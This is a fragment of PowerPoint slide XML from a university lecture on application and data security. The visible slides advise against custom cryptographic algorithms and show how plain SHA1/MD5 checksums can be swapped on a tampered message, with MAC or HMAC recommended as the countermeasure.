            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not develop your own custom algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use the proven cryptographic services provided by the platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stay informed about cracked algorithms and the techniques used to crack them</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1"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276873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0FDD-F362-5C88-7EBF-78E14B5CC96A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E49E8D-5D99-25E2-BC92-F7C78E8CDEFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1644968"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Checksum Spoofing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Do not rely on hashes to provide data integrity for messages sent over networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>SHA1 and MD5 can be intercepted and changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plaintext: Place 10 orders. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Hash: T0mUNdEQh13IO9oTcaP4FYDX6pU= </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plaintext: Place 100 orders. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Hash: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>oEDuJpv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ZtIU7BXDDNv17EAHeAU= </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Instead consider base 64 encoding UTF-8 message with an appended Message Authentication Code (MAC).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use a MAC or HMAC (both use a key to produce a checksum)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F50EBF7-A52D-209F-37B2-8FAC7BD009F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="319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428972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24105</TotalTime>
  <Words>1193</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>175</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Alegreya</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr> IT  Application and Data Security - Unit V</vt:lpstr>
      <vt:lpstr>Web Application: Design Issues</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>File Inclusion (example)</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Cryptography</vt:lpstr>
      <vt:lpstr>Parameter Manipulation </vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Parameter Manipulation …</vt:lpstr>
      <vt:lpstr>Exception Management</vt:lpstr>
      <vt:lpstr>Exception Management</vt:lpstr>
      <vt:lpstr>Exception Management</vt:lpstr>
      <vt:lpstr>Exception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IT  Application and Data Security</dc:title>
  <dc:creator>Gopal Singh Rawat</dc:creator>
  <cp:lastModifiedBy>Akshat Negi</cp:lastModifiedBy>
  <cp:revision>1409</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-01-11T15:19:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T12:57:37Z</dcterms:modified>
</cp:coreProperties>
</file>